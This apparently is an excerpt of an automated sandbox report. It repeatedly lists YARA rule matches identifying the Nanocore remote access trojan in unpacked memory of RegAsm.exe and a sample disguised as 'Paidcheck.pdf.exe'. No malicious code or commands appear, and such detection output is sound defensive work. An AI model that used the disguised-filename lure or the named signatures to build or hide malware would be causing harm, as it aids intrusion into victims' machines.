      Source: 10.2.RegAsm.exe.5f60000.23.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
      Source: 10.2.RegAsm.exe.5f60000.23.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
      Source: 10.2.RegAsm.exe.3c3dc19.10.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
      Source: 10.2.RegAsm.exe.3c3dc19.10.raw.unpack, type: UNPACKEDPE, Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
      Source: 10.2.RegAsm.exe.6b3e8a4.34.raw.unpack, type: UNPACKEDPE, Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
      Source: 10.2.RegAsm.exe.6b3e8a4.34.raw.unpack, type: UNPACKEDPE, Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
      Source: 10.2.RegAsm.exe.6a60000.25.raw.unpack, type: UNPACKEDPE, Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
      Source: 10.2.RegAsm.exe.6a60000.25.raw.unpack, type: UNPACKEDPE, Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
      Source: 10.2.RegAsm.exe.3c395f0.11.unpack, type: UNPACKEDPE, Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
      Source: 10.2.RegAsm.exe.3c395f0.11.unpack, type: UNPACKEDPE, Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
      Source: 10.2.RegAsm.exe.3bd9930.6.raw.unpack, type: UNPACKEDPE, Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
      Source: 10.2.RegAsm.exe.3bd9930.6.raw.unpack, type: UNPACKEDPE, Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
      Source: 10.2.RegAsm.exe.6ac0000.28.unpack, type: UNPACKEDPE, Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
      Source: 10.2.RegAsm.exe.6ac0000.28.unpack, type: UNPACKEDPE, Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
      Source: 10.2.RegAsm.exe.3d4d481.12.unpack, type: UNPACKEDPE, Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
      Source: 10.2.RegAsm.exe.3d4d481.12.unpack, type: UNPACKEDPE, Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
      Source: 0.2.Paidcheck.pdf.exe.3c69950.3.raw.unpack, type: UNPACKEDPE, Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
      Source: 0.2.Paidcheck.pdf.exe.3c69950.3.raw.unpack, type: UNPACKEDPE, Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
      Source: 0.2.Paidcheck.pdf.exe.3c69950.3.raw.unpack, type: UNPACKEDPE, Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
      Source: 10.2.RegAsm.exe.6af0000.31.unpack, type: UNPACKEDPE, Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
      Source: 10.2.RegAsm.exe.6af0000.31.unpack, type: UNPACKEDPE, Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
      Source: 10.2.RegAsm.exe.3f1807f.17.raw.unpack, type: UNPACKEDPE, Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
      Source: 10.2.RegAsm.exe.3f1807f.17.raw.unpack, type: UNPACKEDPE, Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
      Source: 10.2.RegAsm.exe.3f1807f.17.raw.unpack, type: UNPACKEDPE, Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
      Source: 10.2.RegAsm.exe.2c6410c.3.unpack, type: UNPACKEDPE, Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
      Source: 10.2.RegAsm.exe.2c6410c.3.unpack, type: UNPACKEDPE, Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
      Source: 10.2.RegAsm.exe.6ae0000.30.unpack, type: UNPACKEDPE, Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
      Source: 10.2.RegAsm.exe.6ae0000.30.unpack, type: UNPACKEDPE, Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
      Source: 10.2.RegAsm.exe.3bd9930.6.unpack, type: UNPACKEDPE, Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
      Source: 10.2.RegAsm.exe.3bd9930.6.unpack, type: UNPACKEDPE, Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
      Source: 10.2.RegAsm.exe.3d596b5.14.unpack, type: UNPACKEDPE, Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
      Source: 10.2.RegAsm.exe.3d596b5.14.unpack, type: UNPACKEDPE, Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
      Source: 10.2.RegAsm.exe.6b30000.36.raw.unpack, type: UNPACKEDPE, Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
      Source: 10.2.RegAsm.exe.6b30000.36.raw.unpack, type: UNPACKEDPE, Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
      Source: 10.2.RegAsm.exe.3f20eae.16.unpack, type: UNPACKEDPE, Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
      Source: 10.2.RegAsm.exe.3f20eae.16.unpack, type: UNPACKEDPE, Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
      Source: 10.2.RegAsm.exe.6b00000.32.raw.unpack, type: UNPACKEDPE, Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
      Source: 10.2.RegAsm.exe.6b00000.32.raw.unpack, type: UNPACKEDPE, Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
      Source: 10.2.RegAsm.exe.6b34c9f.35.raw.unpack, type: UNPACKEDPE, Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
      Source: 10.2.RegAsm.exe.6b34c9f.35.raw.unpack, type: UNPACKEDPE, Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
      Source: 10.2.RegAsm.exe.6a60000.25.unpack, type: UNPACKEDPE, Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
      Source: 10.2.RegAsm.exe.6a60000.25.unpack, type: UNPACKEDPE, Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
      Source: 10.2.RegAsm.exe.6b00000.32.unpack, type: UNPACKEDPE, Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
      Source: 10.2.RegAsm.exe.6b00000.32.unpack, type: UNPACKEDPE, Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
      Source: 10.2.RegAsm.exe.3f2f2de.15.unpack, type: UNPACKEDPE, Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
      Source: 10.2.RegAsm.exe.3f2f2de.15.unpack, type: UNPACKEDPE, Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
      Source: 10.2.RegAsm.exe.6ab0000.27.raw.unpack, type: UNPACKEDPE, Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
      Source: 10.2.RegAsm.exe.6ab0000.27.raw.unpack, type: UNPACKEDPE, Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
      Source: 10.2.RegAsm.exe.5cf0000.20.raw.unpack, type: UNPACKEDPE, Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
      Source: 10.2.RegAsm.exe.5cf0000.20.raw.unpack, type: UNPACKEDPE, Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
      Source: 10.2.RegAsm.exe.3f20eae.16.raw.unpack, type: UNPACKEDPE, Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
      Source: 10.2.RegAsm.exe.3f20eae.16.raw.unpack, type: UNPACKEDPE, Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
      Source: 10.2.RegAsm.exe.6ab0000.27.unpack, type: UNPACKEDPE, Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
      Source: 10.2.RegAsm.exe.6ab0000.27.unpack, type: UNPACKEDPE, Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
      Source: 10.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE, Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
      Source: 10.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE, Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
      Source: 10.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE, Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
      Source: 10.2.RegAsm.exe.3f1807f.17.unpack, type: UNPACKEDPE, Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
      Source: 10.2.RegAsm.exe.3f1807f.17.unpack, type: UNPACKEDPE, Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
      Source: 0.2.Paidcheck.pdf.exe.2fc8f5c.1.raw.unpack, type: UNPACKEDPE, Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
      Source: 0.2.Paidcheck.pdf.exe.2fc8f5c.1.raw.unpack, type: UNPACKEDPE, Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
      Source: 0.2.Paidcheck.pdf.exe.2fc8f5c.1.raw.unpack, type: UNPACKEDPE, Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
      Source: 10.2.RegAsm.exe.6ac0000.28.raw.unpack, type: UNPACKEDPE, Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
      Source: 10.2.RegAsm.exe.6ac0000.28.raw.unpack, type: UNPACKEDPE, Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
      Source: 10.2.RegAsm.exe.5f64629.22.raw.unpack, type: UNPACKEDPE, Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
      Source: 10.2.RegAsm.exe.5f64629.22.raw.unpack, type: UNPACKEDPE, Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
      Source: 10.2.RegAsm.exe.5f60000.23.raw.unpack, type: UNPACKEDPE, Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
      Source: 10.2.RegAsm.exe.5f60000.23.raw.unpack, type: UNPACKEDPE, Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
      Source: 10.2.RegAsm.exe.6b20000.33.unpack, type: UNPACKEDPE, Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
      Source: 10.2.RegAsm.exe.6b20000.33.unpack, type: UNPACKEDPE, Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
      Source: 10.2.RegAsm.exe.6ad0000.29.raw.unpack, type: UNPACKEDPE, Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
      Source: 10.2.RegAsm.exe.6ad0000.29.raw.unpack, type: UNPACKEDPE, Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
      Source: 10.2.RegAsm.exe.3bde5cf.8.raw.unpack, type: UNPACKEDPE, Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
      Source: 10.2.RegAsm.exe.3bde5cf.8.raw.unpack, type: UNPACKEDPE, Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
      Source: 10.2.RegAsm.exe.3f2f2de.15.raw.unpack, type: UNPACKEDPE, Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
      Source: 10.2.RegAsm.exe.3f2f2de.15.raw.unpack, type: UNPACKEDPE, Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
      Source: 10.2.RegAsm.exe.2c06b78.2.raw.unpack, type: UNPACKEDPE, Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
